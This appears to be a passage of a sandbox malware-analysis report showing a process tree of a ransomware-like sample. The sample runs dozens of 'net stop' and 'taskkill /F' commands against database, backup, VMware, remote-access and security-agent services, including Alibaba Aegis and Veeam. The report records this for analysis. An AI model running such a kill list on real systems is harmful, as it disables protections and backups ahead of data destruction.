C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TeamViewer86⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VMUSBArbService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMUSBArbService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VMAuthdService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMAuthdService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop wanxiao-monitor5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wanxiao-monitor6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop WebAttendServer5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WebAttendServer6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop mysqltransport5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mysqltransport6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop VMnetDHCP5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMnetDHCP6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "VMware NAT Service"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VMware NAT Service"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop Tomcat85⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Tomcat86⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop TeamViewer5⤵
- System Location Discovery: System Language Discovery
- Discovers systems in the same network
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TeamViewer6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop QPCore5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QPCore6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop CASLicenceServer5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASLicenceServer6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop CASWebServer5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASWebServer6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop AutoUpdateService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AutoUpdateService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "Alibaba Security Aegis Detect Service"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Alibaba Security Aegis Detect Service"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "Alibaba Security Aegis Update Service"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Alibaba Security Aegis Update Service"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "AliyunService"5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "AliyunService"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop CASXMLService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASXMLService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop AGSService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AGSService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop RapService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RapService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop DDNSService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DDNSService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop iNethinkSQLBackupSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop iNethinkSQLBackupSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop CASVirtualDiskService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASVirtualDiskService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop CASMsgSrv5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASMsgSrv6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "OracleOraDb10g_homeliSQL*Plus"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "OracleOraDb10g_homeliSQL*Plus"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop OracleDBConsoleilas5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleDBConsoleilas6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MySQL5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdAppService12205⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdAppService12206⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdTaskService12205⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdTaskService12206⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdUpgradeService12205⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdUpgradeService12206⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop K3MobileServiceManage5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop K3MobileServiceManage6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "FileZilla Server"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "FileZilla Server"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop DDVRulesProcessor5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DDVRulesProcessor6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop ImtsEventSvr5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ImtsEventSvr6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop AutoUpdatePatchService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AutoUpdatePatchService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop OMAILREPORT5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OMAILREPORT6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop "Dell Hardware Support"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Dell Hardware Support"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop SupportAssistAgent5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SupportAssistAgent6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop K3MMainSuspendService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop K3MMainSuspendService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop KpService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KpService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop ceng_web_svc_d5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ceng_web_svc_d6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop KugouService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KugouService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop pcas5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop pcas6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8SendMailAdmin5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8SendMailAdmin6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "Bonjour Service"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Bonjour Service"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "Apple Mobile Device Service"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Apple Mobile Device Service"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "ABBYY.Licensing.FineReader.Professional.12.0"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "ABBYY.Licensing.FineReader.Professional.12.0"6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM Veeam.Backup.Service.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlservr.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM httpd.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM java.exe /F5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fdhost.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fdlauncher.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Veeam.Backup.Service.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM reportingservicesservice.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM softmgrlite.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlbrowser.exe /F5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ssms.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vmtoolsd.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM baidunetdisk.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM yundetectservice.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ssclient.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GNAupdaemon.exe /F5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RAVCp164.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM igfxEM.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM igfxHK.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM igfxTray.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM 360bdoctor.exe /F5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GNCEFExternal.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM PrivacyIconClient.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM UIODetect.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AutoDealService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM IDDAService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM EnergyDataService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM MPService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TransMain.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DAService.exe /F5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GoogleCrashHandler.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GoogleCrashHandler64.exe /F5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GoogleUpdate.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cohernece.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vmware-tray.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM MsDtsSrvr.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM msmdsrv.exe /F5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "FileZilla server.exe" /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM UpdateData.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM WebApi.Host.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VGAuthService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM omtsreco.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TNSLSNR.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM oracle.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM msdtc.exe /F5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mmc.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM emagent.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SoftMgrLite.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM UIODetect.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AutoDealService.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Admin.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM IDDAService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM EnergyDataService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM EnterprisePortal.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM MPService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TransMain.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DAService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM tomcat7.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cohernece.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vmware-tray.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM MsDtsSrvr.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Kingdee.k3.Weixin.ClientService.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F5⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ThunderPlatform.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM iexplore.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vm-agent.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vm-agent-daemon.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM eSightService.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cygrunsrv.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM wrapper.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM nginx.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM node.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sshd.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vm-tray.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM iempwatchdog.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlwriter.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM php.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "notepad++.exe" /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "phpStudy.exe" /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM OPCClient.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM navicat.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SupportAssistAgent.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SunloginClient.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SOUNDMAN.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM WeChat.exe /F5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TXPlatform.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Tencentdll.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM httpd.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM jenkins.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM QQ.exe /F5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM HaoZip.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM HaoZipScan.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM navicat.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TSVNCache.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RAVCpl64.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM secbizsrv.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM aliwssv.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Helper_Haozip.exe /F5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM acrotray.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "FileZilla Server Interface.exe" /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM YoudaoNote.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM YNoteCefRender.exe /F5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM idea.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fsnotifier.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM picpick.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM lantern.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sysproxy-cmd.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM service.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM pcas.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM PresentationFontCache.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RtWlan.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM monitor.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Correspond.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ChatServer.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM InetMgr.exe /F5⤵
-
-
-
